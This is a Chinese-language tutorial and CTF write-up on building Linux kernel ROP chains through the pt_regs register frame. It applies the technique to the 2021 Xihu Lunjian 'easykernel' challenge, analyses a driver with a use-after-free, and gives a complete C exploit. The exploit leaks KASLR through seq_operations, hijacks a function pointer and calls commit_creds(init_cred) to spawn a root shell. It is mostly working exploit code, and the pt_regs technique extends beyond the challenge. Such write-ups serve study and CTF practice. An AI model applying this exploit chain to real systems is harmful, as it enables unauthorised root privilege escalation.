利用 pt_regs 构造通用内核 ROP¶
系统调用 与 pt_regs 结构体¶
系统调用的本质是什么?或许不少人都能够答得上来是由我们在用户态布置好相应的参数后执行 syscall
这一汇编指令,通过门结构进入到内核中的 entry_SYSCALL_64
这一函数,随后通过系统调用表跳转到对应的函数。
现在让我们将目光放到 entry_SYSCALL_64
这一用汇编写的函数内部,注意到当程序进入到内核态时,该函数会将所有的寄存器压入内核栈上,形成一个 pt_regs 结构体,该结构体实质上位于内核栈底,定义如下:
/*
 * Saved user-mode register frame. Per the surrounding text, entry_SYSCALL_64
 * pushes the user registers onto the kernel stack on entry, producing this
 * structure at the bottom of the kernel stack. Members are listed from the
 * lowest address (r15) to the highest (ss).
 */
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};
内核栈 与通用 ROP¶
我们都知道,内核栈只有一个页面的大小,而 pt_regs 结构体则固定位于内核栈栈底,当我们劫持内核结构体中的某个函数指针时(例如 seq_operations->start),在我们通过该函数指针劫持内核执行流时 rsp 与 栈底的相对偏移通常是不变的。
而在系统调用过程当中有很多的寄存器其实是不一定能用上的,比如 r8 ~ r15,这些寄存器为我们布置 ROP 链提供了可能,我们不难想到:
- 只需要寻找到一条形如 "add rsp, val ; ret" 的 gadget 便能够完成 ROP
这里笔者给出一个通用的 ROP 板子,方便调试时观察:
/*
 * Debugging template: give every general-purpose register a distinct marker
 * value right before the syscall, so each saved slot can be recognised when
 * the kernel stack is inspected in a debugger.
 * rax is zeroed, rdi/rsi/rdx carry seq_fd, the current rsp and 8
 * (presumably read(seq_fd, rsp, 8), syscall number 0 -- confirm).
 * NOTE(review): Intel operand order and bare symbol operands; presumably
 * built with -masm=intel -- confirm against the build command.
 */
__asm__(
"mov r15, 0xbeefdead;"
"mov r14, 0x11111111;"
"mov r13, 0x22222222;"
"mov r12, 0x33333333;"
"mov rbp, 0x44444444;"
"mov rbx, 0x55555555;"
"mov r11, 0x66666666;"
"mov r10, 0x77777777;"
"mov r9, 0x88888888;"
"mov r8, 0x99999999;"
"xor rax, rax;"
"mov rcx, 0xaaaaaaaa;"
"mov rdx, 8;"
"mov rsi, rsp;"
"mov rdi, seq_fd;" // assumes the hijack is triggered through seq_operations->start
"syscall"
);
新版本内核对抗利用 pt_regs 进行攻击的办法¶
正所谓魔高一尺道高一丈,内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值:
diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
#ifdef CONFIG_X86_64
__visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
{
+ add_random_kstack_offset();
nr = syscall_enter_from_user_mode(regs, nr);
instrumentation_begin();
当然,若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下,仍然可以通过布置一些 slide gadget 来继续完成利用,不过稳定性也大幅下降了。
例题:西湖论剑2021线上初赛 - easykernel¶
分析¶
首先查看启动脚本,可以发现开启了 SMEP 和 KASLR:
#!/bin/sh
# Boot the challenge kernel (bzImage) with rootfs.img as the initrd, 64M of
# RAM and a serial console. SMEP is enabled through the -cpu flags and KASLR
# through the kernel command line.
qemu-system-x86_64 \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"
进入题目环境,查看 /sys/devices/system/cpu/vulnerabilities/*
,可以发现开启了 PTI (页表隔离):
/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected
题目给了个 test.ko,拖入 IDA 进行分析,发现只定义了 ioctl,可以看出是常见的“菜单堆”题目,给出了分配、释放、读、写 object 的功能。对于分配 object,我们需要传入如下形式结构体:
/* Argument block passed to the driver for the allocate request (ioctl 0x20). */
struct
{
    size_t size; /* requested object size */
    void *buf;   /* user buffer whose contents are copied into the new object */
};
对于释放、读、写 object,则需要传入如下形式结构体:
/* Argument block passed to the driver for the free, read and write requests. */
struct
{
size_t idx; /* slot index of the target object */
size_t size; /* byte count for read/write */
void *buf; /* user buffer for read/write */
};
分配:0x20¶
比较常规的 kmalloc,没有限制size,最多可以分配 0x20 个 chunk:
v7 = _kmalloc(v12, 3264LL);
v8 = v7;
if ( !v7 )
return 0LL;
v9 = v12;
v10 = v13;
if ( v12 > 0x7FFFFFFF )
goto LABEL_29;
_check_object_size(v7, v12, 0LL);
v11 = copy_from_user(v8, v10, v9);
if ( v11 )
return 0LL;
while ( addrList[v11] )
{
if ( ++v11 == 32 )
return 0LL;
}
addrList[(int)v11] = v8;
return 0LL;
}
释放:0x30¶
kfree 以后没有清空指针,直接就有一个裸的 UAF 糊脸:
if ( a2 != 32 )
{
if ( a2 != 48 )
return result;
if ( !copy_from_user(&v12, v2, 8LL) )
{
if ( (unsigned int)v12 <= 0x20 )
{
if ( addrList[(unsigned int)v12] )
kfree();
}
return 0LL;
}
return -22LL;
}
读:0x40¶
会调用 show 函数:
if ( a2 == 64 )
{
if ( !copy_from_user(&v12, v2, 24LL) )
{
show(&v12);
return 0LL;
}
return -22LL;
}
其实就是套了一层皮的读 object 内容,加了 hardened usercopy 检查:
/*
 * Decompiled helper behind the "read" ioctl (0x40): copies data from a stored
 * object out to user space through a 0x100-byte stack buffer.
 *
 * a1 points at three 64-bit words: a1[0] is the index into addrList (only the
 * low 32 bits are used), a1[1] the byte count, a1[2] the user destination.
 *
 * Returns 0xFFFFFFFF when the index is above 0x20 or the slot is empty,
 * 0xFFFFFFEA when copy_to_user() reports a failure, and 0 otherwise.
 */
__int64 __fastcall show(_QWORD *a1)
{
const void *v1; // rsi
unsigned __int64 v2; // r13
__int64 v3; // r14
_QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF
_fentry__();
// presumably the stack-protector canary read from gs:0x28 -- confirm
v5[32] = __readgsqword(0x28u);
// zero the first 0x100 bytes of the stack buffer
v5[0] = 0LL;
memset(&v5[1], 0, 0xF8uLL);
// NOTE(review): index 0x20 passes this check, while the allocation path
// only fills slots 0..31 -- confirm the size of addrList
if ( (unsigned int)*a1 > 0x20 )
return 0xFFFFFFFFLL;
v1 = (const void *)addrList[(unsigned int)*a1];
if ( !v1 )
return 0xFFFFFFFFLL;
v2 = a1[1];
v3 = a1[2];
// always copies 0x100 bytes from the object, independent of the size the
// object was allocated with
qmemcpy(v5, v1, 0x100uLL);
// requests larger than the stack buffer hit BUG()
if ( v2 > 0x100 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
BUG();
}
_check_object_size(v5, v2, 1LL);
return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}
写:0x50¶
常规的写入 object:
if ( a2 > 0x40 )
{
if ( a2 == 80 )
{
if ( copy_from_user(&v12, v2, 24LL) )
return -22LL;
if ( (unsigned int)v12 <= 0x20 )
{
v4 = addrList[(unsigned int)v12];
if ( v4 )
{
v5 = v13;
v6 = v14;
if ( v13 <= 0x7FFFFFFF )
{
_check_object_size(addrList[(unsigned int)v12], v13, 0LL);
copy_from_user(v4, v6, v5);
return 0LL;
}
LABEL_29:
BUG();
}
}
}
return 0LL;
}
解法:UAF + seq_operations + pt_regs + ROP¶
题目没有说明,那笔者默认应该是没开 Hardened Freelist,现在又有 UAF,那么解法就是多种多样的了,笔者这里选择用 seq_operations
+ pt_regs
构造 ROP 进行提权:
exp 如下:
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
/*
 * Unslid kernel addresses. main() adds the leaked KASLR offset to each of
 * them before use. SEQ_OPS_0 is the value expected in the first word of the
 * leaked object when no slide is applied.
 */
#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30
/* Descriptor of /dev/kerpwn; set in main() and used by every ioctl wrapper. */
long dev_fd;
/* Request passed to the read (0x40), write (0x50) and free (0x30) ioctls. */
struct op_chunk
{
size_t idx; /* slot index of the target object */
size_t size; /* byte count for read/write */
void *buf; /* user buffer for read/write */
};
/* Request passed to the allocate ioctl (0x20). */
struct alloc_chunk
{
size_t size; /* requested object size */
void *buf; /* user buffer with the object's initial contents */
};
void readChunk(size_t idx, size_t size, void *buf)
{
struct op_chunk op =
{
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x40, &op);
}
void writeChunk(size_t idx, size_t size, void *buf)
{
struct op_chunk op =
{
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x50, &op);
}
void deleteChunk(size_t idx)
{
struct op_chunk op =
{
.idx = idx,
};
ioctl(dev_fd, 0x30, &op);
}
void allocChunk(size_t size, void *buf)
{
struct alloc_chunk alloc =
{
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x20, &alloc);
}
/* Scratch buffer exchanged with the driver (initial contents, leak, overwrite). */
size_t buf[0x100];

/*
 * Slid kernel addresses, filled in by main() once the KASLR offset is known.
 * They are file-scope objects because the inline asm in main() names them
 * directly as operands.
 */
size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;

/* Descriptor of the seq_file; kept as long because the asm loads it into rdi. */
long seq_fd;

/* Unslid kernel text base; the explicit cast makes the integer-to-pointer conversion valid C. */
void * kernel_base = (void *)0xffffffff81000000;

/* KASLR slide computed from the leak (0 until main() sets it). */
size_t kernel_offset = 0;

size_t commit_creds;

/* Address written over the first word of the reclaimed object (stack-pivot gadget). */
size_t gadget;
/*
 * Exploit entry point.
 *
 * 1. Allocate a 0x20-byte object and free it; the driver keeps the stale
 *    pointer in slot 0.
 * 2. Open /proc/self/stat so that a seq_operations table is expected to
 *    reclaim the freed chunk, then read it back through slot 0 to leak a
 *    kernel text pointer and derive the KASLR offset.
 * 3. Overwrite the first word of the table with a stack-adjusting gadget.
 * 4. Load the ROP chain into registers and issue a syscall on seq_fd, so the
 *    chain ends up in the saved register frame on the kernel stack.
 * 5. Spawn a shell.
 *
 * Exits with EXIT_FAILURE if a file cannot be opened or the leak does not look
 * like the expected pointer; returns 0 otherwise. argc/argv/envp are unused.
 */
int main(int argc, char ** argv, char ** envp)
{
    dev_fd = open("/dev/kerpwn", O_RDWR);
    if (dev_fd < 0) {
        perror("open /dev/kerpwn");
        exit(EXIT_FAILURE);
    }

    /* First allocation lands in slot 0; freeing it leaves a dangling pointer there. */
    allocChunk(0x20, buf);
    deleteChunk(0);

    seq_fd = open("/proc/self/stat", O_RDONLY);
    if (seq_fd < 0) {
        perror("open /proc/self/stat");
        exit(EXIT_FAILURE);
    }

    readChunk(0, 0x20, buf);

    /*
     * Sanity-check the leak before trusting it. This assumes KASLR slides the
     * image by a page-aligned amount, so the low 12 bits of the leaked pointer
     * must match the unslid address. Bailing out here avoids writing a bogus
     * gadget into an unrelated object.
     */
    if ((buf[0] & 0xfff) != (SEQ_OPS_0 & 0xfff)) {
        fprintf(stderr, "unexpected leak 0x%zx: chunk was not reclaimed as expected\n", buf[0]);
        exit(EXIT_FAILURE);
    }

    kernel_offset = buf[0] - SEQ_OPS_0;
    /* Cast to char * so the addition is standard C rather than GNU void * arithmetic. */
    kernel_base = (char *)kernel_base + kernel_offset;

    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    /* "add rsp, <imm>" followed by several pops and a ret; the exact form was not recorded by the author. */
    gadget = 0xffffffff8135b0f6 + kernel_offset;

    buf[0] = gadget;
    /* Enter the return-to-user routine 9 bytes in (offset chosen by the author; presumably skips its prologue -- confirm). */
    swapgs_restore_regs_and_return_to_usermode += 9;
    writeChunk(0, 0x20, buf);

    /*
     * NOTE(review): Intel operand order with bare symbol operands; presumably
     * needs -masm=intel and a non-PIE/static link -- confirm against the build
     * command.
     * NOTE(review): this basic asm statement has no clobber list although it
     * overwrites callee-saved registers (rbx, rbp, r12-r15).
     * Intended chain, judging by the values loaded: pop rdi ; ret -> init_cred
     * -> commit_creds -> return-to-user routine.
     */
    __asm__(
        "mov r15, 0xbeefdead;"
        "mov r14, pop_rdi_ret;"
        "mov r13, init_cred;" // value meant to be popped into rdi by the gadget held in r14
        "mov r12, commit_creds;"
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;"
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;"
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov rdi, seq_fd;"
        "syscall"
    );

    system("/bin/sh");
    return 0;
}